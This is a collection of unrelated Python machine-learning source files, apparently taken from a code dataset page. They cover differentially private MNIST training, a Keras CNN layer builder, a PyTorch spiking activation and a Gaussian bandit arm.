save_mistakes=FLAGS.save_mistakes)
sys.stderr.write("eval_accuracy: %.2f\n" % test_accuracy)
curr_time = time.time()
elapsed_time = curr_time - prev_time
prev_time = curr_time
results.append({"step": step + 1, # Number of lots trained so far.
"elapsed_secs": elapsed_time,
"spent_eps_deltas": spent_eps_deltas,
"train_accuracy": train_accuracy,
"test_accuracy": test_accuracy,
"mistakes": mistakes})
loginfo = {"elapsed_secs": curr_time - start_time,
"spent_eps_deltas": spent_eps_deltas,
"train_accuracy": train_accuracy,
"test_accuracy": test_accuracy,
"num_training_steps": step + 1, # Steps so far.
"mistakes": mistakes,
"result_series": results}
loginfo.update(params)
if log_path:
with tf.gfile.Open(log_path, "w") as f:
json.dump(loginfo, f, indent=2)
f.write("\n")
f.close()
if should_terminate:
break
def main(_):
network_parameters = utils.NetworkParameters()
# If the ASCII proto isn't specified, then construct a config protobuf based
# on 3 flags.
network_parameters.input_size = IMAGE_SIZE ** 2
network_parameters.default_gradient_l2norm_bound = (
FLAGS.default_gradient_l2norm_bound)
if FLAGS.projection_dimensions > 0 and FLAGS.num_conv_layers > 0:
raise ValueError("Currently you can't do PCA and have convolutions"
"at the same time. Pick one")
# could add support for PCA after convolutions.
# Currently BuildNetwork can build the network with conv followed by
# projection, but the PCA training works on data, rather than data run
# through a few layers. Will need to init the convs before running the
# PCA, and need to change the PCA subroutine to take a network and perhaps
# allow for batched inputs, to handle larger datasets.
if FLAGS.num_conv_layers > 0:
conv = utils.ConvParameters()
conv.name = "conv1"
conv.in_channels = 1
conv.out_channels = 128
conv.num_outputs = 128 * 14 * 14
network_parameters.conv_parameters.append(conv)
# defaults for the rest: 5x5,stride 1, relu, maxpool 2x2,stride 2.
# insize 28x28, bias, stddev 0.1, non-trainable.
if FLAGS.num_conv_layers > 1:
conv = network_parameters.ConvParameters()
conv.name = "conv2"
conv.in_channels = 128
conv.out_channels = 128
conv.num_outputs = 128 * 7 * 7
conv.in_size = 14
# defaults for the rest: 5x5,stride 1, relu, maxpool 2x2,stride 2.
# bias, stddev 0.1, non-trainable.
network_parameters.conv_parameters.append(conv)
if FLAGS.num_conv_layers > 2:
raise ValueError("Currently --num_conv_layers must be 0,1 or 2."
"Manually create a network_parameters proto for more.")
if FLAGS.projection_dimensions > 0:
network_parameters.projection_type = "PCA"
network_parameters.projection_dimensions = FLAGS.projection_dimensions
for i in xrange(FLAGS.num_hidden_layers):
hidden = utils.LayerParameters()
hidden.name = "hidden%d" % i
hidden.num_units = FLAGS.hidden_layer_num_units
hidden.relu = True
hidden.with_bias = False
hidden.trainable = not FLAGS.freeze_bottom_layers
network_parameters.layer_parameters.append(hidden)
logits = utils.LayerParameters()
logits.name = "logits"
logits.num_units = 10
logits.relu = False
logits.with_bias = False
network_parameters.layer_parameters.append(logits)
Train(FLAGS.training_data_path,
FLAGS.eval_data_path,
network_parameters,
FLAGS.num_training_steps,
FLAGS.save_path,
eval_steps=FLAGS.eval_steps)
if __name__ == "__main__":
tf.app.run()
|
from chia.instrumentation.observers.observer import Observer
from chia.instrumentation.observers.observer_factory import ObserverFactory
__all__ = ["Observer", "ObserverFactory"]
|
import tensorflow as tf
from tensorflow.keras.metrics import BinaryAccuracy, AUC, FalsePositives, FalseNegatives
from tensorflow.keras.losses import BinaryCrossentropy
from tensorflow.keras.callbacks import ReduceLROnPlateau, EarlyStopping
from tensorflow.keras.layers import Conv2D, MaxPooling2D, AveragePooling2D, Flatten, Dense, Dropout, BatchNormalization, InputLayer, LeakyReLU
# from tensorflow.keras.layers import Activation, Reshape
from tensorflow.keras.models import Sequential
# from tensorflow.keras.models import Model
from data_util import calc_class_weight, calc_sample_weight
TF_RANDOM_SEED = 486
tf.random.set_seed(TF_RANDOM_SEED)
print("[cnn_util] Tensorflow Random Seed set to {}".format(TF_RANDOM_SEED))
class CNN_Builder:
DROP_OUT_RANDOM_SEED = 42
@classmethod
def build_Conv2D(cls, config):
"""
e.g. config = "3-3x3-1x1-relu-valid" means
Conv2D(filters=3, kernel_size=(3, 3), strides=(1, 1), activation='relu', padding="valid")
"""
param_list = config.split("-")
if len(param_list) != 5:
raise ValueError("Exact 5 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
filters, kernel_size, strides, activation, padding = param_list
filters = int(filters)
kernel_size = tuple(int(dim) for dim in kernel_size.split("x"))
if len(kernel_size) == 1:
kernel_size = kernel_size[0]
strides = tuple(int(stride) for stride in strides.split("x"))
if len(strides) == 1:
strides = strides[0]
if activation == "LeakyReLU":
activation = lambda x: LeakyReLU()(x)
return Conv2D(filters=filters, kernel_size=kernel_size, strides=strides, activation=activation, padding=padding)
@classmethod
def build_Dense(cls, config):
"""
e.g. config = "16-sigmoid" means Dense(units=16, activation='sigmoid')
"""
param_list = config.split("-")
if len(param_list) != 2:
raise ValueError("Exact 2 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
units, activation = param_list
units = int(units)
if activation == "LeakyReLU":
activation = lambda x: LeakyReLU()(x)
if activation == "None":
activation = None
return Dense(units=units, activation=activation)
@classmethod
def build_Flatten(cls):
return Flatten()
@classmethod
def build_BatchNormalization(cls):
return BatchNormalization()
@classmethod
def _build_Pooling2D(cls, config, class_name):
param_list = config.split("-")
if len(param_list) != 3:
raise ValueError("Exact 3 parameters to config. Got config={}".format(config))
# unpack the param list into specific variables
pool_size, strides, padding = param_list
pool_size = tuple(int(dim) for dim in pool_size.split("x"))
if len(pool_size) == 1:
pool_size = pool_size[0]
strides = tuple(int(stride) for stride in strides.split("x"))
if len(strides) == 1:
strides = strides[0]
if class_name == "MaxPooling2D":
return MaxPooling2D(pool_size=pool_size, strides=strides, padding=padding)
elif class_name == "AveragePooling2D":
return AveragePooling2D(pool_size=pool_size, strides=strides, padding=padding)
else:
raise ValueError("cannot recognize Pooling2D class name. Got {}".format(class_name))
@classmethod
def build_MaxPooling2D(cls, config):
"""
e.g. config = "3x3-2x2-valid" means MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding="valid")
Note that `pool_size` usually is a tuple like (3, 3), denoting a 3x3 window.
If only one integer is specified, the same window length will be used for both dimensions.
"""
return cls._build_Pooling2D(config, "MaxPooling2D")
@classmethod
def build_AveragePooling2D(cls, config):
"""
e.g. config = "3x3-2x2-valid" means AveragePooling2D(pool_size=(3, 3), strides=(2, 2), padding="valid")
Note that `pool_size` usually is a tuple like (3, 3), denoting a 3x3 window.
If only one integer is specified, the same window length will be used for both dimensions.
"""
return cls._build_Pooling2D(config, "AveragePooling2D")
@classmethod
def build_InputLayer(cls, shape):
"""
e.g. shape = "9x2001x1" means InputLayer(input_shape=(9, 2001, 1))
"""
input_shape = tuple(int(dim) for dim in shape.split("x"))
return InputLayer(input_shape=input_shape)
@classmethod
def build_Dropout(cls, rate):
rate = int(rate)
return Dropout(rate=rate, seed=cls.DROP_OUT_RANDOM_SEED)
@classmethod
def build_Sequential(cls, model_config):
"""
e.g. model_config = ("InputLayer:9x2001x1", "Conv2D:3-3-1-relu-valid", "Dense:1-sigmoid") will lead to a Sequential model of
Sequential([
InputLayer(input_shape=(9, 2001, 1)),
Conv2D(filters=3, kernel_size=3, strides=1, activation="relu"),
Dense(units=1, activation='sigmoid')
])
"""
model = Sequential([])
for layer_config in model_config:
layer_name, *config = layer_config.split(":")
if config:
layer = getattr(cls, "build_" + layer_name)(config[0])
else:
layer = getattr(cls, "build_" + layer_name)()
model.add(layer)
return model
def compile_model(model, metric_names, optimizer="adam", build=True):
loss = BinaryCrossentropy(name="loss")
metrics = []
if "acc" in metric_names:
metrics.append(BinaryAccuracy(name="acc"))
if "auprc" in metric_names:
metrics.append(AUC(curve="PR", name="auprc"))
if "auroc" in metric_names:
metrics.append(AUC(curve="ROC", name="auroc"))
if "fp" in metric_names:
metrics.append(FalsePositives(name="fp"))
if "fn" in metric_names:
metrics.append(FalseNegatives(name="fn"))
model.compile(loss=loss, metrics=metrics, optimizer=optimizer)
if build:
# See https://stackoverflow.com/a/59356545 for the usage of build() function
model.build()
def fit_model(model, x_train, y_train, x_test, y_test, batch_size, epochs, use_class_weight=False, use_sample_weight=False, use_reduce_rl=False, use_early_stopping=False, verbose=1):
train_class_weight = calc_class_weight(y_train) if use_class_weight else None
test_sample_weight = calc_sample_weight(y_test) if use_sample_weight else None
if train_class_weight is not None:
print('[cnn_util] using class weight {} for training'.format(train_class_weight))
if test_sample_weight is not None:
print('[cnn_util] using sample weight for testing')
if x_test is None and y_test is None:
validation_data = None
callbacks = None
else:
validation_data = (x_test, y_test, test_sample_weight)
callbacks = []
if use_reduce_rl:
callbacks.append(ReduceLROnPlateau(monitor="val_loss", factor=0.5, patience=3))
if use_early_stopping:
callbacks.append(EarlyStopping(monitor="val_loss", patience=6, restore_best_weights=True))
if not callbacks:
callbacks = None
history = model.fit(x=x_train, y=y_train, class_weight=train_class_weight,
validation_data=validation_data,
batch_size=batch_size, epochs=epochs, callbacks=callbacks, verbose=verbose)
return history
def get_activations(model, x, batch_size=1000):
# get the activations from the last but one layer
activation_model = Model(inputs=model.inputs, outputs=model.layers[-2].output)
with tf.device('/gpu:1'):
activations = activation_model.predict(x, batch_size=batch_size)
return activations |
import torch
class SpikingActivation(torch.autograd.Function):
"""
Function for converting an arbitrary activation function to a spiking equivalent.
Notes
-----
We would not recommend calling this directly, use
`pytorch_spiking.SpikingActivation` instead.
"""
@staticmethod
def forward(
ctx,
inputs,
activation,
dt=0.001,
initial_state=None,
spiking_aware_training=True,
return_sequences=False,
training=False,
):
"""
Forward pass of SpikingActivation function.
Parameters
----------
inputs : ``torch.Tensor``
Array of input values with shape ``(batch_size, n_steps, n_neurons)``.
activation : callable
Activation function to be converted to spiking equivalent.
dt : float
Length of time (in seconds) represented by one time step.
initial_state : ``torch.Tensor``
Initial spiking voltage state (should be an array with shape
``(batch_size, n_neurons)``, with values between 0 and 1). Will use a
uniform distribution if none is specified.
spiking_aware_training : bool
If True (default), use the spiking activation function
for the forward pass and the base activation function for the backward pass.
If False, use the base activation function for the forward and
backward pass during training.
return_sequences : bool
Whether to return the last output in the output sequence (default), or the
full sequence.
training : bool
Whether this function should be executed in training or evaluation mode
(this only matters if ``spiking_aware_training=False``).
"""
ctx.activation = activation
ctx.return_sequences = return_sequences
ctx.save_for_backward(inputs)
if training and not spiking_aware_training:
output = activation(inputs if return_sequences else inputs[:, -1])
return output
if initial_state is None:
initial_state = torch.rand(
inputs.shape[0], inputs.shape[2], dtype=inputs.dtype
)
# match inputs to initial state dtype if one was passed in
inputs = inputs.type(initial_state.dtype)
voltage = initial_state
all_spikes = []
rates = activation(inputs) * dt
for i in range(inputs.shape[1]):
voltage += rates[:, i]
n_spikes = torch.floor(voltage)
voltage -= n_spikes
if return_sequences:
all_spikes.append(n_spikes)
if return_sequences:
output = torch.stack(all_spikes, dim=1)
else:
output = n_spikes
output /= dt
return output
@staticmethod
def backward(ctx, grad_output):
"""Backward pass of SpikingActivation function."""
# TODO: is there a way to reuse the forward pass activations computed in
# `forward`? the below results in an infinite loop
# inputs, rates = ctx.saved_tensors
# return torch.autograd.grad(rates, inputs, grad_outputs=grad_output)
inputs = ctx.saved_tensors[0]
with torch.enable_grad():
output = ctx.activation(inputs if ctx.return_sequences else inputs[:, -1])
return (
torch.autograd.grad(output, inputs, grad_outputs=grad_output)
+ (None,) * 7
)
spiking_activation = SpikingActivation.apply |
import random
class NormalArm():
def __init__(self, mu, sigma):
self.mu = mu
self.sigma = sigma
def draw(self):
return random.gauss(self.mu, self.sigma)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.